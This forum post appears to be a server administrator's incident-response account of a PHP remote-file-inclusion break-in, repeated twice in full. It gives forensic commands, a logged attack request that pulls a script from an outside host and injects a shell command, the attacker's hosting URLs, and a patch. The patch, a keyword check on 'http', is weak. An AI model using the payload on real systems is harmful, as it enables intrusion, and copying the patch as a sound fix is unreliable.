Facebook
Twitter
G
gromett
Guest
I am happy to say that since moving on to Plesk attacks and attempts on my servers have been greatly reduced. The only ones I get now are the cross server scripting ones. Currently I just monitor the /tmp and /var/tmp directory for suspicious files every minute which lets me know when one is in progress. What follows is how I managed to track down how it happened so I could fix the clients dodgy script. I am posting this to help others who may not have time or knowledge to do so.
1) I went to /var/tmp and moved all files to /root/hack for later perusal
2) Did a ps aux to get the process id's and file names of the scripts being run.
apache 29836 0.0 0.0 864 184 ttyp0 S 19:32 0:00 ./ssh-scan 100
These had been created by a shell called /.x
3) Did a netstat -lvanp to find out the remote IP of the attacker.
tcp 0 0 213.232.100.82:5500 222.124.31.12:4352 ESTABLISHED 7862/x
4) Hackers IP is 222.124.31.12 now to find out which script was responsible for the breach
5) used this find command to check all log files
find /home/httpd/vhosts/ -name access_log -print -exec grep "195.93.21.100" {} \;
6) From this I could see the site name (modified)
cat /home/httpd/vhosts/thedomain.com/statistics/logs/access_log | grep "222.124.31.12" >/root/hack/access_log
Here is a sample log entry
/eolaud.php?SiteRef=http://www.virama.com/net.txt?&cmd=cd%20/var/spool/samba;mkdir%20.ro HTTP/1.0" 200 9623 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)"
The script was is called eolaud.php
I had a look at this script and it had 1 line of php code in it.
<?
include $SiteRef;
?>
You can see that by passing ?SiteRef=......
You could include a file or script from another site.
I changed this script to the following and notified the client
<?
if (eregi("http",$SiteRef)) {
$SiteRef="";
}
include $SiteRef;
?>
If a remote address is now entered it blanks the variable.
In addition to this I have contacted the 4 hosts that were used by the hacker including the
http://geocities.com/evikhobare/dodol.txt
www.virama.com
the IP owner for the hacker and the site were he had his hacking tools hosted.
Hopefully he will be shut down. I have offered all the forensic evidence to the providers if they want to bring the authorities in.
I am updating my checking scripts to include an hourly scan of all access_logs looking for /var/tmp and /tmp
I hope this info helps.
Regards Karl
1) I went to /var/tmp and moved all files to /root/hack for later perusal
2) Did a ps aux to get the process id's and file names of the scripts being run.
apache 29836 0.0 0.0 864 184 ttyp0 S 19:32 0:00 ./ssh-scan 100
These had been created by a shell called /.x
3) Did a netstat -lvanp to find out the remote IP of the attacker.
tcp 0 0 213.232.100.82:5500 222.124.31.12:4352 ESTABLISHED 7862/x
4) Hackers IP is 222.124.31.12 now to find out which script was responsible for the breach
5) used this find command to check all log files
find /home/httpd/vhosts/ -name access_log -print -exec grep "195.93.21.100" {} \;
6) From this I could see the site name (modified)
cat /home/httpd/vhosts/thedomain.com/statistics/logs/access_log | grep "222.124.31.12" >/root/hack/access_log
Here is a sample log entry
/eolaud.php?SiteRef=http://www.virama.com/net.txt?&cmd=cd%20/var/spool/samba;mkdir%20.ro HTTP/1.0" 200 9623 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)"
The script was is called eolaud.php
I had a look at this script and it had 1 line of php code in it.
<?
include $SiteRef;
?>
You can see that by passing ?SiteRef=......
You could include a file or script from another site.
I changed this script to the following and notified the client
<?
if (eregi("http",$SiteRef)) {
$SiteRef="";
}
include $SiteRef;
?>
If a remote address is now entered it blanks the variable.
In addition to this I have contacted the 4 hosts that were used by the hacker including the
http://geocities.com/evikhobare/dodol.txt
www.virama.com
the IP owner for the hacker and the site were he had his hacking tools hosted.
Hopefully he will be shut down. I have offered all the forensic evidence to the providers if they want to bring the authorities in.
I am updating my checking scripts to include an hourly scan of all access_logs looking for /var/tmp and /tmp
I hope this info helps.
Regards Karl